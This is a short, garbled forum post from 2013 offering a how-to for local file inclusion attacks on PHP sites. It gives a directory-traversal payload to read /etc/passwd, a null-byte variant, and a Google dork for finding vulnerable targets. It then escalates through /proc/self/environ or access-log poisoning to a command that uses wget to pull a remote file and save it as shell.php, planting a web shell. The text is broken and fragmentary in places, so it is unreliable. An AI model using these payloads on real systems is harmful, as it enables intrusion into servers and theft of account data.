LFI- local file inclusion Its include the file of the server in - TopicsExpress



          

LFI- local file inclusion Its include the file of the server in our browser.. To see if a script is vulnerable to local file inclusion, index.php?page=../../../../../../../../../etc/passwd That Shows the complete User information in that server with paths.. Where ../ causes the script to move up one directoryWhere directory, Multiple ../ cause the script to move to the top level directory (/, the root of the filesystem) and /etc/passwd is the Unix passwd file. google dork: inurl:.php?page= example:xxx(dot)com/contacts.php?page=abc.php test:xxx(dot)com/contacts.php?page=../xyz.php now in linux server server there is etc/password 1... xyzdotcom/index ../ =../../../etc/passwd =../../../etc/passwd%00 etc/passwdfile (google) proc/self/environ is the writable file by end or var/log/httpd-access.log is also writable proc/self/environ add one- user agent switcher config.php ../proc/self//environ&cmd=wget t35/abc.txt O shell.php config.php ip username pwd
Posted on: Thu, 14 Nov 2013 15:43:59 +0000

Trending Topics



Recently Viewed Topics




© 2015